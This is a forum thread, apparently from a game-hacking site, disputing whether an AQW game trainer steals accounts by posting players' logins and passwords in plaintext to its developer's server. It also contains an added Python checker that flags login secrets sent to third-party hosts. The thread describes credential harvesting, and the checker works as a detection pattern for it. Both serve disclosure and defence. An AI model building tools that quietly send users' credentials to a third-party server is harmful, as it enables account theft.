https://www.mpgh.net/forum/showthread.php?t=1156518
This trainer in the AQW hacks section at the moment is a blatant account stealer which is clearly unsafe and any attempts of me to mention it to the section moderator @Hunter have been deleted without reason and he has refused conference with me over the issue. I'd love to explain to him why it isn't safe, but since he doesn't seem to want to hear it I'll just tell you here.
This is the POST request sent when adding a bot with the trainer's add bot feature. The username and password there are my AQW login credentials being sent to noticemeae.cf, which is the creator's personal website. Also take note of how my password is being sent completely unencrypted, which means anyone connected to the same Wi-Fi as me could easily intercept and steal my password.
Here is a message from the owner defending it, saying that it deletes your password and does not store them. We can take this with a grain of salt though, considering all the handling of the data is done within the PHP, which is 100% server-sided, meaning it can be changed at any time without the knowledge of any of the users or staff who may have inspected it.
Thanks for your concern, but @master131 analyzed the said file himself and deemed it to be safe so yeah, not going to do anything about the file in question as such.
Last edited by Hunter; 08-20-2016 at 12:03 PM.
I've provided all the proof required. All the data is handled on the server, so even if he analyzed it and said that it's safe, they could change the PHP to store passwords without your knowledge. None of it is handled client-sided. What are you having trouble understanding?
- - - Updated - - -
@Hunter I appreciate your opinion but I don't believe you're qualified to weigh in on the matter, could you please get some other staff in here that will be able to discuss the logistics of the program's operations? You said you don't care about me so you're obviously playing biases hard.
Last edited by Zeffer; 08-20-2016 at 12:07 PM.
Playing biases hard? Oh please, give me a break. Everyone knows I've no problem in punishing one for their wrongdoing regardless of who they may be. The thing is, master131 is our finest file analyzer and as such, I'd rather trust his judgement over yours. If he deems the said file not to be safe after all, then I'll delete its thread otherwise I won't do absolutely anything about it.
Last edited by Hunter; 08-20-2016 at 12:22 PM. Reason: Typos.
@master131
Can you come and tell me how this program is safe given the information I've provided? Give me facts, all I've been given so far is that you've checked it, I've been given no facts on how it's actually safe considering the way the program operates.
Last edited by Zeffer; 08-20-2016 at 12:17 PM.
Sending a password/username to a third party server isn't safe.
I'll investigate it.
THE EYE OF AN ADMINISTRATOR IS UPON YOU. ANY WRONG YOU DO IM GONNA SEE, WHEN YOU'RE ON MPGH, LOOK BEHIND YOU, 'CAUSE THATS WHERE IM GONNA BE
"First they ignore you. Then they laugh at you. Then they fight you. Then you lose.” - Dave84311
HAVING VIRTUAL DETOX
The file should not have been approved. The reason sounds like bullshit... to ensure that no spamming occurs? What does that even mean? @ToxLP
ty hunter for reassuring us that the file is 100% safe
Last edited by sa3m; 08-20-2016 at 01:22 PM. Reason: fixed grammar error
Hey, so lemme explain please. In v0.01, when I did not add any security, what users did was spam more than 10k bots; luckily they had similar names like name-1, name-2, etc.
I had to delete all that with a DELETE WHERE LIKE SQL query, so in v0.02 I needed to implement a feature which stops spamming, so I thought of this:
I made the user and pass get sent to the PHP POST. What I used the user and pass for is:
Make a curl POST request to the actual game login with the user and pass supplied. If the response was a success, it meant the user is legit and can add a bot; if it wasn't, it blocked the request.
I only saved the Username, BotName, BotData, IP.
IP, Username are used to ban users from adding, to make sure they're the right spammers.
So the delete bot function can make sure the correct user is deleting it. It also had the User, Pass sent there and made a curl request again to make sure spammers weren't spamming delete.
Edit:
In the end I never saved any password of any user.
The only thing I saved that was theirs is just their Username and IP.
Last edited by ToxLP; 08-20-2016 at 01:24 PM.
Why was the pass even needed, check the current state of login and username.. Kek. A captcha, anything would work. And if you save a username and IP, if your app isn't secure, what's to say the server is? One db dump and you have fucked everyone using your bot. Might as well be a username collector for AE.
Also, I can spam create AQW accounts and then spam your bot, so your security wouldn't have worked except for basic spamming.
Edit: you could've also just checked character pages to see if the account existed.
Last edited by chibizs; 08-20-2016 at 02:51 PM. Reason: Another thought
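A check a file reviewer could run over a captured request like the one described in this thread, flagging login fields sent to a host outside the game's own domains or without TLS. This is an added example, not part of any post in the thread or of the trainer's code; the request path, field names and the `game.example` first-party domain are assumptions, and the sample request is constructed.

```python
from urllib.parse import parse_qsl, urlsplit

# Form-field names treated as login secrets (assumed list; extend as needed).
SECRET_FIELDS = {"password", "pass", "passwd", "pwd"}

# Constructed sample: path, field names and values are placeholders.
SAMPLE = (
    "POST /addbot.php HTTP/1.1\r\n"
    "Host: noticemeae.cf\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=example_user&password=example_pass&botname=demo"
)

def parse_request(raw):
    """Split a raw HTTP/1.x request into (target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers, body

def review_request(raw, scheme, first_party):
    """Return findings for one request captured from the tool under review."""
    target, headers, body = parse_request(raw)
    host = headers.get("host", "").split(":")[0].lower()
    # Collect parameters from the query string and a form-encoded body.
    params = parse_qsl(urlsplit(target).query)
    if headers.get("content-type", "").lower().startswith(
            "application/x-www-form-urlencoded"):
        params += parse_qsl(body)
    if not any(name.lower() in SECRET_FIELDS for name, _ in params):
        return []
    findings = []
    if not any(host == d or host.endswith("." + d) for d in first_party):
        findings.append(f"login secret sent to third-party host {host}")
    if scheme != "https":
        findings.append("login secret sent without TLS")
    return findings

if __name__ == "__main__":
    # game.example stands in for the game's real login domain (assumption).
    for finding in review_request(SAMPLE, "http", {"game.example"}):
        print(finding)
```

A clean result only covers what leaves the client; what the server does with the data after receiving it cannot be established from a capture.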
Thread won't be undeleted and will remain that way. Reprimand will be handed out.